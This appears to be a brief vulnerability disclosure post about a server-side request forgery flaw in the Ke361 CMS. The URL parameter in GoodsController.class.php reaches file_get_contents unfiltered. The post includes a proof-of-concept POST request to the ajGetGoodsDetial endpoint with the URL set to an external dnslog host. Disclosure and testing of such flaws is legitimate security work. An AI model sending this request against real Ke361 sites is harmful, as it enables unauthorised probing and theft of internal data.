Ke361 Goodscontroller Class Php Ssrf Vulnerability
Ke361 Goodscontroller Class Php Ssrf Vulnerability
Ke361 GoodsController.class.php SSRF vulnerability
Vulnerability Description
Ke361 GoodsController.class.php URL parameter has an SSRF vulnerability, and sensitive information can be obtained through the vulnerability.
Vulnerability Impact
Ke361
Environment construction
https://gitee.com/jcove/ke361
Vulnerability reappears
CMS Product Page
The vulnerable file is Application/Home/Controller/GoodsController.class.php
The URL parameters are not filtered, and the file_get_contents function is passed in, causing SSRF vulnerability and constructing requests
1
2
3
POST /index.php?s=/Goods/ajGetGoodsDetial
url=https://6si2gt.dnslog.cn
This post is licensed under CC BY 4.0 by the author.